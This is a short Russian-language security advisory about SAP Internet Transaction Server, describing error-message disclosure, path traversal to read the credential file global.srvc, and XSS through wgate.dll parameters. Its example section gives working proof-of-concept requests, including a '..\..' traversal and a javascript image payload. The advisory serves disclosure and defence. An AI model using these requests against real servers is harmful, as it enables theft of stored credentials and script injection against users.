Межсайтовый скриптинг и раскрытие информации в SAP Internet Transaction Server

Программа: SAP Internet Transcaction Server Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в SAP Internet Transaction Server (ITS). Удаленный атакующий может раскрыть различную информацию и выполнить XSS нападение.

Все уязвимости обнаружены в "wgate.dll" и связаны с недостаточной фильтрацией пользовательских данных в the "~service", "~templatelanguage", "~language", "~theme", и "~template" параметрах. В результате сервер может:

1. Возвратить сообщение об ошибке, в которой содержится системная информация об операционной системе, версии программного обеспечения и структуре директорий, если представлены некорректные параметры.
2. Раскрыть содержание произвольных файлов, представляя специально обработанное значение для "~theme" и "~template" параметров. В результате удаленный пользователь может получить доступ к конфигурационному файлу "global.srvc", который содержит имя пользователя и шифрованные пароли.
3. Выполнить XSS нападение, представляя произвольный код сценария в параметре "~service".

Пример/Эксплоит:

1.

Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc+++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++
++

 
http://www.server.name/scripts/wgate.dll?

with params:
~service=--><img%09src=javascript:alert(1)%3bcrap

URL производителя:http://www.sap.com

Решение: